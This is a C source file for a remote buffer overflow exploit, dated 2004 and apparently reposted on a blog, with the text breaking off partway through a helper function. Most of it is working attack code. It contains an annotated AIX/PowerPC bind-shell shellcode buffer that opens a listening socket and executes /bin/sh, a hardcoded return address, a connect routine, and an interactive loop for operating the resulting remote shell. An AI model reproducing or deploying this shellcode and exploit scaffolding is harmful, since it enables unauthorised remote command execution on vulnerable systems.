/* client.c - remote overflow demo * * 2004.06.16 * san@nsfocus.com */ #include#include #include #include #include #include #include #include #include #include #include #include #include // It needs adjust. #define RET 0x2ff22d88; unsigned char sh_Buff[] = "\x7e\x94\xa2\x79" /* xor. r20,r20,r20 */ "\x40\x82\xff\xfd" /* bnel */ "\x7e\xa8\x02\xa6" /* mflr r21 */ "\x3a\xc0\x01\xff" /* lil r22,0x1ff */ "\x3a\xf6\xfe\x2d" /* cal r23,-467(r22) */ "\x7e\xb5\xba\x14" /* cax r21,r21,r23 */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x20" /* bctr */ "\x05\x82\x53\xa0" /* syscall numbers */ "\x87\xa0\x01\x42" /* execve=0x05 close=0xa0 */ "\x8d\x8c\x8b\x8a" /* socket=0x8d bind=0x8c */ /* listen=0x8b naccept=0x8a */ /* kfcntl=0x142 */ "\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */ "\x44\xff\xff\x02" /* svca 0x0 */ "\x3a\xb5\xff\xf8" /* cal r21,-8(r21) */ "\x2c\x74\x12\x34" /* cmpi cr0,r20,0x1234 */ "\x41\x82\xff\xfd" /* beql */ "\x7f\x08\x02\xa6" /* mflr r24 */ "\x92\x98\xff\xfc" /* st r20,-4(r24) */ "\x38\x76\xfe\x03" /* cal r3,-509(r22) */ "\x38\x96\xfe\x02" /* cal r4,-510(r22) */ "\x98\x78\xff\xf9" /* stb r3,-7(r24) */ "\x7e\x85\xa3\x78" /* mr r5,r20 */ "\x88\x55\xff\xfc" /* lbz r2,-4(r21) */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x21" /* bctrl */ "\x7c\x79\x1b\x78" /* mr r25,r3 */ "\x38\x98\xff\xf8" /* cal r4,-8(r24) */ "\x38\xb6\xfe\x11" /* cal r5,-495(r22) */ "\x88\x55\xff\xfd" /* lbz r2,-3(r21) */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x21" /* bctrl */ "\x7f\x23\xcb\x78" /* mr r3,r25 */ "\x38\x96\xfe\x06" /* cal r4,-506(r22) */ "\x88\x55\xff\xfe" /* lbz r2,-2(r21) */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x21" /* bctrl */ "\x7f\x23\xcb\x78" /* mr r3,r25 */ "\x7e\x84\xa3\x78" /* mr r4,r20 */ "\x7e\x85\xa3\x78" /* mr r5,r20 */ "\x88\x55\xff\xff" /* lbz r2,-1(r21) */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x21" /* bctrl */ "\x7c\x79\x1b\x78" /* mr r25,r3 */ "\x3b\x56\xfe\x03" /* cal r26,-509(r22) */ "\x7f\x43\xd3\x78" /* mr r3,r26 */ "\x88\x55\xff\xf7" /* lbz r2,-9(r21) */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x21" /* bctrl */ "\x7f\x23\xcb\x78" /* mr r3,r25 */ "\x7e\x84\xa3\x78" /* mr r4,r20 */ "\x7f\x45\xd3\x78" /* mr r5,r26 */ "\xa0\x55\xff\xfa" /* lhz r2,-6(r21) */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x21" /* bctrl */ "\x37\x5a\xff\xff" /* ai. r26,r26,-1 */ "\x40\x80\xff\xd4" /* bge */ "\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */ "\x40\x82\xff\xfd" /* bnel */ "\x7f\xe8\x02\xa6" /* mflr r31 */ "\x3b\xff\x01\x20" /* cal r31,0x120(r31) */ "\x38\x7f\xff\x08" /* cal r3,-248(r31) */ "\x38\x9f\xff\x10" /* cal r4,-240(r31) */ "\x90\x7f\xff\x10" /* st r3,-240(r31) */ "\x90\xbf\xff\x14" /* st r5,-236(r31) */ "\x88\x55\xff\xf4" /* lbz r2,-12(r21) */ "\x98\xbf\xff\x0f" /* stb r5,-241(r31) */ "\x7e\xa9\x03\xa6" /* mtctr r21 */ "\x4e\x80\x04\x20" /* bctr */ "/bin/sh" ; // ripped from isno int Make_Connection(char *address,int port,int timeout) { struct sockaddr_in target; int s,i,bf; fd_set wd; struct timeval tv; s = socket(AF_INET,SOCK_STREAM,0); if(s<0) return -1; target.sin_family = AF_INET; target.sin_addr.s_addr = inet_addr(address); if(target.sin_addr.s_addr==0) { close(s); return -2; } target.sin_port = htons(port); bf = 1; ioctl(s,FIONBIO,&bf); tv.tv_sec = timeout; tv.tv_usec = 0; FD_ZERO(&wd); FD_SET(s,&wd); connect(s,(struct sockaddr *)&target,sizeof(target)); if((i=select(s+1,0,&wd,0,&tv))==(-1)) { close(s); return -3; } if(i==0) { close(s); return -4; } i = sizeof(int); getsockopt(s,SOL_SOCKET,SO_ERROR,(char *)&bf,&i); if((bf!=0)||(i!=sizeof(int))) { close(s); return -5; } ioctl(s,FIONBIO,&bf); return s; } /* ripped from TESO code */ void shell (int sock) { int l; char buf[512]; fd_set rfds; while (1) { FD_SET (0, &rfds); FD_SET (sock, &rfds); select (sock + 1, &rfds, NULL, NULL, NULL); if (FD_ISSET (0, &rfds)) { l = read (0, buf, sizeof (buf)); if (l <= 0) { perror ("read user"); exit (EXIT_FAILURE); } write (sock, buf, l); } if (FD_ISSET (sock, &rfds)) { l = read (sock, buf, sizeof (buf)); if (l <= 0) { perror ("read remote"); exit (EXIT_FAILURE); } write (1, buf, l); } } } void PrintSc(unsigned char *lpBuff, int buffsize) { int i,j; char *p; char msg[4]; fprintf(stderr, "/* %d bytes */\n",buffsize); for(i=0;i
0 comments:
Post a Comment